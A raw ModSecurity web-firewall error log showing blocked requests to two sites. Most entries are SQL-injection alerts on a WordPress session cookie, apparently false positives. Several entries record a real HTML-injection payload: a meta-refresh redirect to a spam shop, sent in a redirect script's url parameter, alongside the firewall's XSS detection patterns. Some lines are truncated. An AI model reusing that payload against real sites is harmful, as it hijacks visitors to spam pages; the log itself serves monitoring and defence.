[Mon May 11 18:34:24.688811 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFEEWKUxpmnkK7zHysawAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:24.689112 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFEEWKUxpmnkK7zHysawAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:25.238401 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFEEWKUxpmnkK7zHysawAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:25.385427 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFEUWKUxpmnkK7zHysbQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:25.385711 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFEUWKUxpmnkK7zHysbQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:25.928841 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFEUWKUxpmnkK7zHysbQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:26.117812 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFEkWKUxpmnkK7zHysbgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:26.118208 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFEkWKUxpmnkK7zHysbgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:26.494353 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFEkWKUxpmnkK7zHysbgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:26.872695 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFEkWKUxpmnkK7zHysbwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:26.872983 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFEkWKUxpmnkK7zHysbwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:27.461616 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFEkWKUxpmnkK7zHysbwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:28.342898 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFFEWKUxpmnkK7zHyscgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:28.343197 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFFEWKUxpmnkK7zHyscgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:28.609878 2026] [security2:error] [pid 1416109:tid 1416141] [client 27.78.84.116:58487] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFFFV4kyjgo4bQBUiBgwAAAMs"]
[Mon May 11 18:34:28.611405 2026] [security2:error] [pid 1416109:tid 1416141] [client 27.78.84.116:58487] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFFFV4kyjgo4bQBUiBgwAAAMs"]
[Mon May 11 18:34:28.614857 2026] [security2:error] [pid 1416109:tid 1416141] [client 27.78.84.116:58487] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFFFV4kyjgo4bQBUiBgwAAAMs"]
[Mon May 11 18:34:28.615168 2026] [security2:error] [pid 1416109:tid 1416141] [client 27.78.84.116:58487] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFFFV4kyjgo4bQBUiBgwAAAMs"]
[Mon May 11 18:34:28.616217 2026] [security2:error] [pid 1416109:tid 1416141] [client 27.78.84.116:58487] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFFFV4kyjgo4bQBUiBgwAAAMs"]
[Mon May 11 18:34:28.616714 2026] [security2:error] [pid 1416109:tid 1416141] [client 27.78.84.116:58487] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFFFV4kyjgo4bQBUiBgwAAAMs"]
[Mon May 11 18:34:28.616980 2026] [security2:error] [pid 1416109:tid 1416141] [client 27.78.84.116:58487] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFFFV4kyjgo4bQBUiBgwAAAMs"]
[Mon May 11 18:34:28.946194 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFFEWKUxpmnkK7zHyscgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:29.378010 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFFUWKUxpmnkK7zHysdAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:29.378330 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFFUWKUxpmnkK7zHysdAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:29.961621 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFFUWKUxpmnkK7zHysdAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:30.278855 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFFkWKUxpmnkK7zHysdgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:30.279146 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFFkWKUxpmnkK7zHysdgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:30.845425 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFFkWKUxpmnkK7zHysdgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:31.251078 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFF0WKUxpmnkK7zHysdwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:31.251456 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFF0WKUxpmnkK7zHysdwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:31.813900 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFF0WKUxpmnkK7zHysdwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:31.931227 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id 